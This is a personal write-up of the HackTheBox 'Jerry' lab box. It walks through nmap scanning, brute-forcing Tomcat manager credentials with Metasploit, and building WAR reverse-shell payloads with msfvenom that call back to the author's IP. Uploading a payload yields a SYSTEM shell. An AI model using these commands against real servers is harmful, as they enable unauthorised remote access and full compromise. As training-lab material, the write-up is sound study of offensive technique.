HackTheBox: Jerry
01/13/2024
This is the third Windows box Im doing, after [[Blue]] and [[Legacy]]. These are the easiest of the easy as far as windows boxes go. Im still basically just blowing through them and looking at the writeup as soon as I get stuck. I dont feel bad about it since I have 0 experience with this os, so I dont mind getting a boost and just exposing myself to as much as possible.
Enumeration
That was weird. Multiple nmap scans showed the host as being down. I had to run the nmap option to check if host was up using sudo nmap -O 10.10.10.95
, which finally showed that port 8080 (http-proxy) was open.
Okay. Let me add jerry
and jerry.htb
to /etc/hosts
and then try navigating to the site.
Exploring the tomcat website
http://jerry.htb:8080
brings us to a Tomcat test page.
using curl -s http://jerry.htb:8080/docs/ | grep Tomcat
, we find that it's running Tomcat 7.0.88.
Lets use metasploit's Tomcat manager bruteforcer:
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit
<SNIP>
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
</SNIP>
Note that this success was buried in a sea of failures,as is often the case in life and in computers. Anyway yeah, we got manager creds.
With these, going forward, we can upload a WAR file and gain RCE or a revshell.
Getting RCE through the manager page
Im in to the manager page with the credentials tomcat:s3cret
.
We get some juicy details about the target system from this page: - Windows Server 2012 R2 - Windows OS 6.3 - amd64 - Hostname: JERRY
I may as well learn how to use msfvenom to generate a WAR shell. We'll resort to trusty tldr
:
$ tldr msfvenom
List payloads:
msfvenom -l payloads
List formats:
msfvenom -l formats
Lets first see what formats we can choose from:
$ msfvenom -l formats
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
ducky-script-psh
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war
"war" is going to be the format we want, which I know from past experience with Tomcat (from Thales, which was the very first box I did on my own). Its some kind of java-based archive, but I dont remember exactly what it stands for.
So it looks like we'll want to use --format war
in the command.
Now lets see what payloads we have at our disposal:
$ msfvenom -l payloads
<SNIP>
cmd/windows/powershell/meterpreter/reverse_tcp
</SNIP>
<SNIP>
windows/x64/meterpreter/reverse_tcp
</SNIP>
One of these two should work.
Back to tldr
, it shows an example of generating a file as follows:
Create an EXE binary with a reverse TCP handler:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f exe -o path/to/binary.exe
We'll tweak this slightly to meet our needs. We swap exe
for war
and plug in our host details:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war -o ./payload.war
Then run msfconsole
, and start a payload-less listener using use exploit/multi/handler
, then set the LHOST
and LPORT
options, and run exploit
to start it.
Now we have to upload the malicious file to the Tomcat server. We navigate to the List Applications
tab, and then scroll down to the "WAR file to deploy". Upload the newly-created malicious file.
No luck.
After a bunch of trial and error, I wound up having success with this shell I found online by googling "msfvenom webshell":
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
Then I ran the exploit/multi/handler
in msfconsole to set up a meterpreter listener.
Then I uploaded the shell.war file and FINALLY got a shell:
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.95:49192) at 2023-10-13 17:55:50 -0400
Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
C:\apache-tomcat-7.0.88>pwd
pwd
C:\apache-tomcat-7.0.88>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\apache-tomcat-7.0.88
06/19/2018 04:07 AM <DIR> .
06/19/2018 04:07 AM <DIR> ..
06/19/2018 04:06 AM <DIR> bin
06/19/2018 06:47 AM <DIR> conf
06/19/2018 04:06 AM <DIR> lib
05/07/2018 02:16 PM 57,896 LICENSE
10/14/2023 06:39 AM <DIR> logs
05/07/2018 02:16 PM 1,275 NOTICE
05/07/2018 02:16 PM 9,600 RELEASE-NOTES
05/07/2018 02:16 PM 17,454 RUNNING.txt
06/19/2018 04:06 AM <DIR> temp
10/14/2023 07:55 AM <DIR> webapps
06/19/2018 04:34 AM <DIR> work
4 File(s) 86,225 bytes
9 Dir(s) 2,364,530,688 bytes free
C:\apache-tomcat-7.0.88>
and here's the best part:
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system